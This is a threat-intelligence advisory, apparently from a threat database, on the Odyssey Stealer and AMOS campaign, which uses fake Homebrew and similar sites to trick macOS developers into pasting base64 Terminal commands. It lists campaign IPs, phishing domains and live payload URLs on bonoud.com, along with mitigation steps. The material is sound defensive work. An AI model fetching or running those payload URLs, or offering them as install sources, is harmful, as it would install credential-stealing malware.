Odyssey Stealer & AMOS Hit macOS Developers with Fake Homebrew Sites
A sophisticated malware campaign targets macOS developers by impersonating trusted platforms such as Homebrew, TradingView, and LogMeIn through over 85 phishing domains. Attackers use social engineering to trick users into pasting base64-encoded commands into the Terminal, which downloads and executes Odyssey Stealer and AMOS malware. The malware attempts privilege escalation, performs anti-analysis checks, and disrupts backup services to maintain persistence and evade detection. The campaign infrastructure includes long-standing IP addresses and shared SSL certificates, indicating a well-established operation. This threat specifically targets developer environments on macOS, leveraging trust in popular developer tools. No CVSS score is available, but the threat is assessed as medium severity due to its targeted nature and complexity. European organizations with macOS developer workstations are at risk, especially in countries with high macOS adoption and active software development sectors. Mitigation requires user education, strict command execution policies, and network monitoring for suspicious domains and IPs.
AI Analysis
Technical Summary
This campaign involves a coordinated effort to distribute two malware families, Odyssey Stealer and AMOS, targeting macOS developers by exploiting their trust in widely used platforms like Homebrew, TradingView, and LogMeIn. Attackers create over 85 phishing domains that closely mimic legitimate sites, sharing SSL certificates and infrastructure to appear credible. The infection vector relies heavily on social engineering, where victims are persuaded to paste base64-encoded commands into the macOS Terminal. These commands download malicious payloads from attacker-controlled URLs such as bonoud.com. Once executed, the malware attempts to escalate privileges to gain deeper system access, conducts anti-analysis techniques to avoid sandboxing or forensic detection, and disrupts backup services to hinder recovery efforts. The campaign infrastructure includes IP addresses with multi-year activity, demonstrating persistence and adaptability. The malware leverages multiple MITRE ATT&CK techniques including T1056.001 (Input Capture), T1548.003 (Abuse Elevation Control Mechanism), T1204.002 (User Execution: Malicious File), and others related to credential access and defense evasion. The targeted nature of this campaign against macOS developers suggests a focus on stealing intellectual property, credentials, or sensitive development environment data. The absence of a CVSS score and the medium severity rating reflect the complexity and targeted scope rather than widespread impact. Indicators of compromise include specific domains and IP addresses linked to the campaign, which can be used for detection and blocking.
Potential Impact
European organizations employing macOS systems in development environments face risks including credential theft, intellectual property loss, and potential system compromise. The malware’s ability to escalate privileges and disrupt backup services increases the potential for significant operational disruption and data loss. Developers compromised by this campaign could inadvertently introduce vulnerabilities or malicious code into software supply chains, amplifying the threat beyond initial infection. The social engineering aspect exploits user trust, making technical controls alone insufficient without user awareness. Organizations with remote or hybrid workforces using macOS devices are particularly vulnerable. The persistence and anti-analysis capabilities of the malware complicate detection and remediation efforts, potentially leading to prolonged exposure. The campaign’s infrastructure reuse and long-term activity suggest a sustained threat that could evolve, posing ongoing risks to European software development ecosystems.
Mitigation Recommendations
1. Implement strict policies forbidding the execution of unverified commands in Terminal, especially those received via unsolicited communications or unknown websites. 2. Conduct targeted user awareness training for developers emphasizing the risks of social engineering and the dangers of executing base64-encoded commands from untrusted sources. 3. Deploy endpoint detection and response (EDR) solutions capable of detecting privilege escalation attempts, anti-analysis behaviors, and suspicious network connections to known malicious domains and IPs identified in this campaign. 4. Use DNS filtering and network security controls to block access to the identified phishing domains and associated IP addresses. 5. Enforce multi-factor authentication (MFA) for developer accounts and sensitive systems to reduce the impact of credential theft. 6. Regularly audit and monitor backup services to ensure they are operational and protected from tampering or disruption. 7. Maintain up-to-date macOS security patches and monitor for unusual system behaviors indicative of malware presence. 8. Encourage developers to verify software sources through official channels and avoid downloading tools or updates from unofficial or suspicious websites. 9. Integrate threat intelligence feeds containing indicators of compromise from this campaign into security monitoring tools for proactive detection. 10. Consider application whitelisting or restricting execution privileges for scripts and binaries in developer environments.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Denmark, Ireland
Indicators of Compromise
- ip: 195.82.147.38
- ip: 93.152.230.79
- url: https://bonoud.com/get3/install.sh
- url: https://bonoud.com/get6/update
- domain: bonoud.com
- domain: filmoraus.com
- domain: homebrewclubs.org
- domain: homebrewfaq.org
- domain: homebrewonline.org
- domain: homebrewupdate.org
- domain: logmeeine.com
- domain: logmeln.com
- domain: sites-phantom.com
- domain: tradingviewen.com
Odyssey Stealer & AMOS Hit macOS Developers with Fake Homebrew Sites
Description
A sophisticated malware campaign targets macOS developers by impersonating trusted platforms such as Homebrew, TradingView, and LogMeIn through over 85 phishing domains. Attackers use social engineering to trick users into pasting base64-encoded commands into the Terminal, which downloads and executes Odyssey Stealer and AMOS malware. The malware attempts privilege escalation, performs anti-analysis checks, and disrupts backup services to maintain persistence and evade detection. The campaign infrastructure includes long-standing IP addresses and shared SSL certificates, indicating a well-established operation. This threat specifically targets developer environments on macOS, leveraging trust in popular developer tools. No CVSS score is available, but the threat is assessed as medium severity due to its targeted nature and complexity. European organizations with macOS developer workstations are at risk, especially in countries with high macOS adoption and active software development sectors. Mitigation requires user education, strict command execution policies, and network monitoring for suspicious domains and IPs.
AI-Powered Analysis
Technical Analysis
This campaign involves a coordinated effort to distribute two malware families, Odyssey Stealer and AMOS, targeting macOS developers by exploiting their trust in widely used platforms like Homebrew, TradingView, and LogMeIn. Attackers create over 85 phishing domains that closely mimic legitimate sites, sharing SSL certificates and infrastructure to appear credible. The infection vector relies heavily on social engineering, where victims are persuaded to paste base64-encoded commands into the macOS Terminal. These commands download malicious payloads from attacker-controlled URLs such as bonoud.com. Once executed, the malware attempts to escalate privileges to gain deeper system access, conducts anti-analysis techniques to avoid sandboxing or forensic detection, and disrupts backup services to hinder recovery efforts. The campaign infrastructure includes IP addresses with multi-year activity, demonstrating persistence and adaptability. The malware leverages multiple MITRE ATT&CK techniques including T1056.001 (Input Capture), T1548.003 (Abuse Elevation Control Mechanism), T1204.002 (User Execution: Malicious File), and others related to credential access and defense evasion. The targeted nature of this campaign against macOS developers suggests a focus on stealing intellectual property, credentials, or sensitive development environment data. The absence of a CVSS score and the medium severity rating reflect the complexity and targeted scope rather than widespread impact. Indicators of compromise include specific domains and IP addresses linked to the campaign, which can be used for detection and blocking.
Potential Impact
European organizations employing macOS systems in development environments face risks including credential theft, intellectual property loss, and potential system compromise. The malware’s ability to escalate privileges and disrupt backup services increases the potential for significant operational disruption and data loss. Developers compromised by this campaign could inadvertently introduce vulnerabilities or malicious code into software supply chains, amplifying the threat beyond initial infection. The social engineering aspect exploits user trust, making technical controls alone insufficient without user awareness. Organizations with remote or hybrid workforces using macOS devices are particularly vulnerable. The persistence and anti-analysis capabilities of the malware complicate detection and remediation efforts, potentially leading to prolonged exposure. The campaign’s infrastructure reuse and long-term activity suggest a sustained threat that could evolve, posing ongoing risks to European software development ecosystems.
Mitigation Recommendations
1. Implement strict policies forbidding the execution of unverified commands in Terminal, especially those received via unsolicited communications or unknown websites. 2. Conduct targeted user awareness training for developers emphasizing the risks of social engineering and the dangers of executing base64-encoded commands from untrusted sources. 3. Deploy endpoint detection and response (EDR) solutions capable of detecting privilege escalation attempts, anti-analysis behaviors, and suspicious network connections to known malicious domains and IPs identified in this campaign. 4. Use DNS filtering and network security controls to block access to the identified phishing domains and associated IP addresses. 5. Enforce multi-factor authentication (MFA) for developer accounts and sensitive systems to reduce the impact of credential theft. 6. Regularly audit and monitor backup services to ensure they are operational and protected from tampering or disruption. 7. Maintain up-to-date macOS security patches and monitor for unusual system behaviors indicative of malware presence. 8. Encourage developers to verify software sources through official channels and avoid downloading tools or updates from unofficial or suspicious websites. 9. Integrate threat intelligence feeds containing indicators of compromise from this campaign into security monitoring tools for proactive detection. 10. Consider application whitelisting or restricting execution privileges for scripts and binaries in developer environments.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://hunt.io/blog/macos-odyssey-amos-malware-campaign"]
- Adversary
- null
- Pulse Id
- 68f130fdef3c6aab4fcab821
- Threat Score
- null
Indicators of Compromise
Ip
| Value | Description | Copy |
|---|---|---|
ip195.82.147.38 | — | |
ip93.152.230.79 | — |
Url
| Value | Description | Copy |
|---|---|---|
urlhttps://bonoud.com/get3/install.sh | — | |
urlhttps://bonoud.com/get6/update | — |
Domain
| Value | Description | Copy |
|---|---|---|
domainbonoud.com | — | |
domainfilmoraus.com | — | |
domainhomebrewclubs.org | — | |
domainhomebrewfaq.org | — | |
domainhomebrewonline.org | — | |
domainhomebrewupdate.org | — | |
domainlogmeeine.com | — | |
domainlogmeln.com | — | |
domainsites-phantom.com | — | |
domaintradingviewen.com | — |
Threat ID: 68f163919f8a5dbaea0bfe82
Added to database: 10/16/2025, 9:28:49 PM
Last enriched: 10/16/2025, 9:44:46 PM
Last updated: 10/17/2025, 10:33:02 PM
Views: 55
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
Malicious package with AdaptixC2 framework agent found in npm registry
MediumHidden links: why your website traffic is declining
MediumCAPI Backdoor: .NET Stealer Targeting Russian Auto-Commerce
MediumMalicious Perplexity Comet Browser Download Ads Push Password Stealer Via Google Search
MediumRansomware attacks and how victims respond
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.